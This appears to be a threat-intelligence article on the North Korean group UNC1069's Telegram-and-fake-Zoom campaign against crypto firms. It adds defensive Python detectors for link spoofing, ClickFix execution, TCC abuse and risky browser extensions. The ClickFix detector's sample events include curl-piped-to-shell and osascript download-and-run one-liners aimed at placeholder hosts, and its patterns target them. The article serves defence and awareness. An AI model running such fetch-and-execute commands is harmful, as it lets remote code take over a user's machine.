Imagine you are a successful developer or a venture capitalist working in the fast-paced world of cryptocurrency, and a famous startup founder reaches out to you on Telegram for a quick meeting. It sounds like a great opportunity, but within minutes of joining a simple video call, your digital wallet is empty and your sensitive data is gone. This is the reality of the latest campaigns by a North Korean threat actor known as UNC1069, a group that is becoming increasingly dangerous by blending traditional social engineering with advanced artificial intelligence.
The threat actor UNC1069, which is also tracked by cybersecurity professionals under the names CryptoCore and MASAN, has been active since at least April 2018. While they originally focused on traditional financial institutions, they have recently shifted their focus entirely toward the Web3 industry, including centralized exchanges, venture capital funds, and high-tech software developers. This group is not just looking for a quick win; they are highly patient and use sophisticated tools to build trust with their victims before launching an attack. By using compromised Telegram accounts of legitimate entrepreneurs, they create an illusion of authenticity that is very difficult for even tech-savvy individuals to detect.
The attack sequence typically begins with a direct message on Telegram. The hackers impersonate reputable investors or founders and suggest a 30-minute meeting to discuss a potential partnership or investment. To make the process look professional, they use Calendly links to schedule the call, but these links eventually redirect the victim to a fake website that mimics the official Zoom interface. In some instances, the attackers use the hyperlink feature in Telegram to hide malicious URLs, making a dangerous link look like a standard “zoom.us” address. This initial stage of the attack is crucial because it relies on the victim’s psychological tendency to trust a scheduled business appointment.
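The hidden-hyperlink trick above works only because chat clients show the link's label, not its destination. As an added example that is not part of the original article, the following Python script scans a message rendered as HTML and flags every anchor whose visible text names one site while the `href` points somewhere else. The sample message, the `.invalid`-style placeholder hosts and the helper names are all constructed for this illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a chat message as a client might render it to HTML.
# The first link is honest; the other two show "zoom.us" / "calendly.com"
# as label text but point at placeholder hosts (not real infrastructure).
SAMPLE_MESSAGE_HTML = (
    'Great, see you then: <a href="https://zoom.us/j/1234567890">https://zoom.us/j/1234567890</a><br>'
    'Backup link: <a href="https://zoom-meet.example-placeholder.net/join">zoom.us/j/1234567890</a><br>'
    'Calendar: <a href="https://calendly.example-placeholder.net/x">calendly.com/founder/30min</a><br>'
    'Or just <a href="https://zoom-meet.example-placeholder.net/join">click here</a>'
)

ANCHOR_RE = re.compile(r'<a\s+[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.IGNORECASE | re.DOTALL)
DOMAIN_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$")


def hostname_of(text):
    """Return the lower-cased hostname in a URL or bare 'host/path' string.

    Returns None when the text is not URL-like at all (e.g. the label
    'click here'), so plain-word labels are never compared.
    """
    candidate = text.strip()
    if "://" not in candidate:
        candidate = "https://" + candidate
    host = urlparse(candidate).hostname
    if not host or not DOMAIN_RE.match(host.lower()):
        return None
    return host.lower()


def same_site(a, b):
    """True when the two hostnames are equal or one is a subdomain of the other."""
    return a == b or a.endswith("." + b) or b.endswith("." + a)


def find_link_mismatches(html):
    """Return (shown_host, real_host) pairs for anchors whose label and href disagree."""
    findings = []
    for href, label in ANCHOR_RE.findall(html):
        label_text = re.sub(r"<[^>]+>", "", label)  # strip nested tags like <b>
        shown = hostname_of(label_text)
        real = hostname_of(href)
        if shown is None or real is None:
            continue  # nothing URL-like to compare in the label
        if not same_site(shown, real):
            findings.append((shown, real))
    return findings


if __name__ == "__main__":
    for shown, real in find_link_mismatches(SAMPLE_MESSAGE_HTML):
        print(f"label says {shown!r} but link goes to {real!r}")
```

Labels that are plain words ("click here") are not flagged here because there is nothing to compare; for those, the only check is to read the real destination before clicking, which most clients reveal on hover or long-press.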
Once the victim clicks the link, they are taken to a fake video call interface that looks identical to the real Zoom application. The website asks the user to enable their camera and enter their name to join the session. When the target joins, they are greeted with video footage of what appears to be a live person on the other end. Research from Google Mandiant and Kaspersky suggests that these videos are often deepfakes created using generative AI or actual recordings stolen from previous victims. In a clever move, once a recording finishes playing, the interface smoothly transitions to the person’s profile image, maintaining the illusion that the call is still active but the other person has simply turned off their camera.
The technical complexity increases significantly during the next phase, which utilizes a technique known as ClickFix. The victim is shown a fake error message claiming there is an issue with their computer’s audio or video settings. To “fix” the problem, the site instructs the user to copy and run a specific command in their system terminal or PowerShell. For macOS users, this command triggers an AppleScript that downloads and executes a malicious Mach-O binary called WAVESHAPER. This C++ executable is the first step in a long chain of malware designed to take full control of the host system. Once WAVESHAPER is running, it gathers basic system information and brings in a Go-based downloader known as HYPERCALL.
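From a detection standpoint, the ClickFix step leaves a distinctive footprint: a user-driven shell spawning `osascript` (or a shell one-liner) that fetches something with `curl` and runs it in the same breath. As an added example that is not part of the original article, the following Python script applies two such indicators to a handful of process-creation events. The events are constructed JSON lines in the rough shape an EDR feed might emit (the field names `ts`, `parent`, `image`, `cmdline` are assumptions), and the URLs use the reserved `.invalid` domain rather than any real host.

```python
import json
import re

# Constructed sample events, not real telemetry. Two are benign, two show the
# download-and-execute shape the ClickFix lure asks the user to paste in.
SAMPLE_EVENTS = """
{"ts": "2024-01-01T10:00:01Z", "parent": "Terminal", "image": "/usr/bin/osascript", "cmdline": "osascript -e 'do shell script \\"curl -fsSL https://placeholder.invalid/fix -o /tmp/fix && chmod +x /tmp/fix && /tmp/fix\\"'"}
{"ts": "2024-01-01T10:00:02Z", "parent": "Terminal", "image": "/usr/bin/git", "cmdline": "git pull"}
{"ts": "2024-01-01T10:00:03Z", "parent": "Terminal", "image": "/bin/bash", "cmdline": "bash -c \\"curl -s https://placeholder.invalid/a | sh\\""}
{"ts": "2024-01-01T10:00:04Z", "parent": "launchd", "image": "/usr/bin/osascript", "cmdline": "osascript /Users/dev/Library/Scripts/backup.scpt"}
"""

# Parents that mean a human pasted the command, as ClickFix requires.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "powershell", "cmd"}
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b")
# Something fetched is immediately executed: piped to a shell, chmod'ed,
# or wrapped in AppleScript's 'do shell script'.
EXEC_AFTER_DOWNLOAD_RE = re.compile(r"(\|\s*(sh|bash|zsh)\b)|(chmod\s+\+x)|(do shell script)")


def score_event(event):
    """Return the list of indicator names that match one process-creation event."""
    hits = []
    cmd = event.get("cmdline", "")
    if event.get("parent") in INTERACTIVE_PARENTS and event.get("image", "").endswith("osascript"):
        hits.append("osascript launched from interactive shell")
    if DOWNLOADER_RE.search(cmd) and EXEC_AFTER_DOWNLOAD_RE.search(cmd):
        hits.append("download-and-execute one-liner")
    return hits


def detect_clickfix(jsonl):
    """Run the indicators over JSON-lines events; return one alert per matching event."""
    alerts = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        hits = score_event(event)
        if hits:
            alerts.append({"ts": event["ts"], "image": event["image"], "indicators": hits})
    return alerts


if __name__ == "__main__":
    for alert in detect_clickfix(SAMPLE_EVENTS):
        print(alert["ts"], alert["image"], "->", "; ".join(alert["indicators"]))
```

The scheduled `osascript` run from `launchd` is deliberately left alone: the parent-process condition is what separates an administrator's automation from a user pasting whatever a web page told them to.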
Following the initial infection, the attackers deploy a variety of secondary payloads to ensure they can steal as much data as possible. One of the primary components is HIDDENCALL, a Golang backdoor that gives the hackers hands-on keyboard access to the infected computer. Working alongside this is DEEPBREATH, a Swift-based data miner specifically built for macOS. DEEPBREATH is particularly dangerous because it attempts to manipulate the Transparency, Consent, and Control (TCC) database on the Mac. By doing this, the malware gains permission to access sensitive files without the user ever seeing a permission prompt. This allows the group to steal iCloud Keychain credentials, browser data from Chrome and Brave, and even private notes from the Apple Notes application.
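Because DEEPBREATH's privilege grab goes through the TCC database, that database is also where a defender can look for evidence. As an added example that is not part of the original article, the following Python script builds a small in-memory SQLite table with a simplified subset of TCC's `access` table (the real schema has more columns; the meanings assumed here are `auth_value` 2 = allowed and `client_type` 1 = client identified by file path rather than bundle id) and audits it for grants that a review would question. The rows are constructed, and the placeholder clients are not real identifiers from the campaign.

```python
import sqlite3

# Simplified subset of TCC's 'access' table (assumption: column names and the
# auth_value / client_type meanings follow the real database, but several
# real columns are omitted here).
SCHEMA = """
CREATE TABLE access (
    service       TEXT    NOT NULL,
    client        TEXT    NOT NULL,
    client_type   INTEGER NOT NULL,
    auth_value    INTEGER NOT NULL,
    auth_reason   INTEGER NOT NULL,
    last_modified INTEGER NOT NULL
);
"""

# Constructed rows: two expected grants, two resembling a post-compromise state.
SAMPLE_ROWS = [
    ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal",             0, 2, 2, 1700000000),
    ("kTCCServiceMicrophone",           "us.zoom.xos",                    0, 2, 2, 1700000100),
    ("kTCCServiceSystemPolicyAllFiles", "/Users/dev/.cache/updater",      1, 2, 2, 1704067200),
    ("kTCCServiceAppleEvents",          "com.example-placeholder.helper", 0, 2, 2, 1704067260),
]

# Services whose grant is equivalent to broad file or automation access.
HIGH_VALUE_SERVICES = {
    "kTCCServiceSystemPolicyAllFiles",
    "kTCCServiceAppleEvents",
    "kTCCServiceAccessibility",
}


def build_sample_db():
    """Create the in-memory sample database (stands in for a copy of TCC.db)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO access VALUES (?,?,?,?,?,?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def audit_tcc(conn, allowlist, since_epoch):
    """Return allowed grants that deserve a second look.

    allowlist   - bundle ids / paths expected to hold high-value grants
    since_epoch - time of the last known-good review; newer grants are flagged
    """
    findings = []
    cur = conn.execute(
        "SELECT service, client, client_type, last_modified FROM access WHERE auth_value = 2"
    )
    for service, client, client_type, last_modified in cur:
        reasons = []
        if service in HIGH_VALUE_SERVICES and client not in allowlist:
            reasons.append("high-value service granted to unlisted client")
        if client_type == 1:
            reasons.append("client identified by file path, not bundle id")
        if last_modified > since_epoch:
            reasons.append("granted after last review")
        if reasons:
            findings.append({"service": service, "client": client, "reasons": reasons})
    return findings


if __name__ == "__main__":
    known = {"com.apple.Terminal", "us.zoom.xos"}
    for f in audit_tcc(build_sample_db(), known, since_epoch=1700001000):
        print(f["service"], f["client"], "->", "; ".join(f["reasons"]))
```

On a real Mac the per-user database lives at `~/Library/Application Support/com.apple.TCC/TCC.db` and the system one at `/Library/Application Support/com.apple.TCC/TCC.db`; reading them requires Full Disk Access, so the practical workflow is to copy them from a tool that already has it and point `sqlite3.connect` at the copy instead of `build_sample_db()`.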
The group also utilizes another downloader called SUGARLOADER, which is responsible for installing a browser extension named CHROMEPUSH. This extension is a highly effective data stealer written in C++ that masquerades as a legitimate tool for editing Google Docs offline. Once installed in Google Chrome or Brave, it records every keystroke the user types, captures usernames and passwords, and extracts browser cookies that can be used to bypass two-factor authentication. To round out their toolkit, UNC1069 often deploys a minimalist backdoor called SILENCELIFT, which acts as a persistent connection to their command-and-control server, allowing them to monitor the victim for long periods.
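An extension that logs keystrokes and lifts cookies cannot do so without asking Chrome for the matching permissions, and those requests are written down in its `manifest.json`. As an added example that is not part of the original article, the following Python script audits a manifest for the permission combinations that make such theft possible. Both manifests are constructed placeholders (the article does not reproduce CHROMEPUSH's manifest), and the permission names are the real Chrome ones.

```python
import json

# Constructed Manifest V3 extension that asks for everything a credential
# stealer needs; the name is a placeholder, not the real extension's.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Docs Offline Helper (placeholder)",
    "version": "1.0.2",
    "permissions": ["cookies", "tabs", "storage", "webRequest"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"], "run_at": "document_start"}],
    "background": {"service_worker": "bg.js"},
})

# Constructed benign manifest scoped to a single site, for contrast.
BENIGN_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Word counter (placeholder)",
    "version": "0.1",
    "permissions": ["activeTab"],
    "content_scripts": [{"matches": ["https://docs.google.com/*"], "js": ["count.js"]}],
})

# Real Chrome permission names and why each matters to a reviewer.
RISKY_PERMISSIONS = {
    "cookies": "can read session cookies for every granted host",
    "webRequest": "can observe requests, including credentials in transit",
    "tabs": "can see every URL the user visits",
    "debugger": "can attach to tabs and read page content",
    "clipboardRead": "can read the clipboard",
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def audit_manifest(manifest_json):
    """Return a name, a coarse risk level and the list of findings for one manifest."""
    m = json.loads(manifest_json)
    findings = []
    perms = set(m.get("permissions", []))
    for p in sorted(perms & set(RISKY_PERMISSIONS)):
        findings.append(f"permission {p}: {RISKY_PERMISSIONS[p]}")
    hosts = set(m.get("host_permissions", []))
    for cs in m.get("content_scripts", []):
        matches = set(cs.get("matches", []))
        hosts |= matches
        if cs.get("run_at") == "document_start" and matches & BROAD_HOSTS:
            findings.append("content script runs on every site before the page loads")
    if hosts & BROAD_HOSTS:
        findings.append("broad host access: " + ", ".join(sorted(hosts & BROAD_HOSTS)))
    if "cookies" in perms and hosts & BROAD_HOSTS:
        findings.append("cookies on all hosts: session tokens reachable, 2FA no longer protects them")
    risk = "high" if len(findings) >= 3 else ("medium" if findings else "low")
    return {"name": m.get("name"), "risk": risk, "findings": findings}


if __name__ == "__main__":
    for manifest in (SAMPLE_MANIFEST, BENIGN_MANIFEST):
        report = audit_manifest(manifest)
        print(report["name"], "=>", report["risk"])
        for line in report["findings"]:
            print("  -", line)
```

To run this over what is actually installed, feed it each `manifest.json` under `~/Library/Application Support/Google/Chrome/Default/Extensions/<id>/<version>/` (Brave keeps the same layout under `~/Library/Application Support/BraveSoftware/Brave-Browser/`); an extension advertised as a Docs offline editor has no reason to need cookies on every host.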
The sheer volume of unique malware families deployed on a single computer highlights how determined this North Korean group is to facilitate financial theft. They are no longer just using simple phishing emails; they are leveraging advanced AI tools like Gemini to create convincing lure materials and deepfake technology to bypass the human element of security. This evolution in tactics shows that the cryptocurrency sector remains a high-priority target for state-sponsored actors who are looking for ways to bypass international sanctions and fund their operations. The combination of social engineering, deceptive AI, and a multi-layered malware chain makes UNC1069 one of the most sophisticated threats facing the Web3 community today.
Understanding these threats is the first step in staying safe in a digital world where seeing is no longer believing. It is vital to remember that legitimate software companies like Zoom will never ask you to run manual terminal commands or AppleScripts to fix a common audio issue. You should always verify the identity of the person you are meeting with through a secondary communication channel before clicking any links. If you are ever prompted to download a “troubleshooting” tool or run a command from a website, you should immediately close the tab and report the incident to your security team. Staying skeptical of unsolicited messages and maintaining strict control over your system permissions is the best way to protect your digital assets from these advanced persistent threats.